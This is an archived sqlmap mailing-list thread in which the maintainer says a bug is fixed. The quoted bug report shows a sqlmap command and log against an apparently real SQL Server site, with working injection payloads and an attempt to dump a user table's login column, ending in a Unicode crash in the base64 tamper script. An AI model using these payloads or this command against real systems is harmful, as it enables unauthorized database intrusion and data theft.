Hi.
This should be fixed now.
Bye
On Sat, Sep 21, 2013 at 4:55 AM, 沸水浮冰 <sfq...@gmail.com> wrote:
> root@anonymous:~/sqlmap-0905# ./sqlmap.py -r file2 -p 'major'
> --dbms=mssql --level=5 --risk=3 --tamper=base64encode -D vls3db4 -T
> dbo.dd_users -C '最后登录时间' --dump --hex -v 3
>
> sqlmap/1.0-dev-4cf49bc - automatic SQL injection and database takeover
> tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 00:51:25
>
> [00:51:25] [INFO] parsing HTTP request from 'file2'
> [00:51:25] [DEBUG] not a valid WebScarab log data
> [00:51:25] [DEBUG] cleaning up configuration parameters
> [00:51:25] [INFO] loading tamper script 'base64encode'
> [00:51:25] [DEBUG] setting the HTTP timeout
> [00:51:25] [DEBUG] setting the HTTP method to GET
> [00:51:25] [DEBUG] creating HTTP requests opener object
> [00:51:25] [DEBUG] forcing back-end DBMS to user defined value
> [00:51:25] [WARNING] it appears that you have provided tainted parameter
> values ('major=')waitfor delay'0:0:20'--') with most probably leftover
> chars/statements from manual SQL injection test(s). Please, always use only
> valid parameter values so sqlmap could be able to run properly
> Are you sure you want to continue? [y/N] y
> [00:51:26] [INFO] testing connection to the target URL
> [00:51:49] [DEBUG] declared web page charset 'gb2312'
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: major
> Type: boolean-based blind
> Title: OR boolean-based blind - WHERE or HAVING clause
> Payload: classid=&specialid=2&qstr=&major=-1315') OR (1954=1954) AND
> ('IRZo'='IRZo&station=&idxpage=2&ptopid=
> Vector: OR ([INFERENCE])
>
> Type: error-based
> Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING
> clause
> Payload: classid=&specialid=2&qstr=&major=-3052') OR
> 5359=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN
> (5359=5359) THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113))) AND
> ('PLJO'='PLJO&station=&idxpage=2&ptopid=
> Vector: OR [RANDNUM]=CONVERT(INT,(SELECT
> '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
>
> Type: UNION query
> Title: Generic UNION query (random number) - 16 columns
> Payload: classid=&specialid=2&qstr=&major=-7814') UNION ALL SELECT
> CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+CHAR(106)+CHAR(86)+CHAR(99)+CHAR(114)+CHAR(70)+CHAR(111)+CHAR(78)+CHAR(116)+CHAR(69)+CHAR(87)+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113),1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654--
> &station=&idxpage=2&ptopid=
> Vector: UNION ALL SELECT
> [QUERY],9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026--
>
> ---
> [00:51:49] [WARNING] changes made by tampering scripts are not included in
> shown payload content(s)
> [00:51:49] [INFO] testing Microsoft SQL Server
> [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
> [00:51:49] [INFO] confirming Microsoft SQL Server
> [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
> [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
> [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
> [00:51:49] [PAYLOAD]
> LTQ3MjInKSBVTklPTiBBTEwgU0VMRUNUIENIQVIoMTEzKStDSEFSKDEyMikrQ0hBUigxMTgpK0NIQVIoMTIxKStDSEFSKDExMykrKENBU0UgV0hFTiAoQ09OQ0FUKE5VTEwsTlVMTCk9Q09OQ0FUKE5VTEwsTlVMTCkpIFRIRU4gQ0hBUig0OSkgRUxTRSBDSEFSKDQ4KSBFTkQpK0NIQVIoMTEzKStDSEFSKDEwMSkrQ0hBUig5OSkrQ0hBUig5OSkrQ0hBUigxMTMpLDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LS0g
> [00:51:50] [DEBUG] performed 1 queries in 0.57 seconds
> [00:51:50] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 2003
> web application technology: ASP.NET, Microsoft IIS 6.0
> back-end DBMS: Microsoft SQL Server 2008
> [00:51:50] [INFO] fetching columns '最后登录时间' for table 'dd_users' in
> database 'vls3db4'
> [00:51:50] [INFO] the SQL query used returns 1 entries
> [00:51:50] [DEBUG] performed 0 queries in 0.02 seconds
> [00:51:50] [INFO] fetching entries of column(s) '[最后登录时间]' for table
> 'dd_users' in database 'vls3db4'
> [00:51:50] [DEBUG] performed 0 queries in 0.00 seconds
> [00:51:50] [INFO] fetching number of distinct values for column '[最后登录时间]'
>
> Traceback (most recent call last):
> File "/root/sqlmap-0905/thirdparty/ansistrm/ansistrm.py", line 51, in
> emit
> message = stdoutencode(self.format(record))
> File "/root/sqlmap-0905/lib/core/convert.py", line 160, in stdoutencode
> retVal = data.encode(UNICODE_ENCODING)
> UnicodeDecodeError: 'ascii' codec can't decode byte 0xe6 in position 688:
> ordinal not in range(128)
> Logged from file sqlmap.py, line 125
> Traceback (most recent call last):
> File "./sqlmap.py", line 95, in main
> start()
> File "/root/sqlmap-0905/lib/controller/controller.py", line 582, in start
> action()
> File "/root/sqlmap-0905/lib/controller/action.py", line 127, in action
> conf.dbmsHandler.dumpTable()
> File "/root/sqlmap-0905/plugins/generic/entries.py", line 155, in
> dumpTable
> retVal = pivotDumpTable(table, colList, blind=False)
> File "/root/sqlmap-0905/lib/utils/pivotdumptable.py", line 86, in
> pivotDumpTable
> value = inject.getValue(query, blind=blind, union=not blind, error=not
> blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
> File "/root/sqlmap-0905/lib/request/inject.py", line 360, in getValue
> value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else
> query, unpack, dump)
> File "/root/sqlmap-0905/lib/request/inject.py", line 312, in _goUnion
> output = unionUse(expression, unpack=unpack, dump=dump)
> File "/root/sqlmap-0905/lib/techniques/union/use.py", line 334, in
> unionUse
> output = _oneShotUnionUse(expression, unpack)
> File "/root/sqlmap-0905/lib/techniques/union/use.py", line 73, in
> _oneShotUnionUse
> page, headers = Request.queryPage(payload, content=True,
> raise404=False)
> File "/root/sqlmap-0905/lib/request/connect.py", line 641, in queryPage
> payload = function(payload=payload, headers=auxHeaders)
> File "/root/sqlmap-0905/tamper/base64encode.py", line 25, in tamper
> return base64.b64encode(payload) if payload else payload
> File "/usr/lib/python2.7/base64.py", line 53, in b64encode
> encoded = binascii.b2a_base64(s)[:-1]
> UnicodeEncodeError: 'ascii' codec can't encode characters in position
> 147-152: ordinal not in range(128)
>
> [*] shutting down at 00:51:50
>
>
>
> ------------------------------------------------------------------------------
> LIMITED TIME SALE - Full Year of Microsoft Training For Just $49.99!
> 1,500+ hours of tutorials including VisualStudio 2012, Windows 8,
> SharePoint
> 2013, SQL 2012, MVC 4, more. BEST VALUE: New Multi-Library Power Pack
> includes
> Mobile, Cloud, Java, and UX Design. Lowest price ever! Ends 9/22/13.
> http://pubads.g.doubleclick.net/gampad/clk?id=64545871&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
LIMITED TIME SALE - Full Year of Microsoft Training For Just $49.99!
1,500+ hours of tutorials including VisualStudio 2012, Windows 8, SharePoint
2013, SQL 2012, MVC 4, more. BEST VALUE: New Multi-Library Power Pack includes
Mobile, Cloud, Java, and UX Design. Lowest price ever! Ends 9/22/13.
http://pubads.g.doubleclick.net/gampad/clk?id=64545871&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
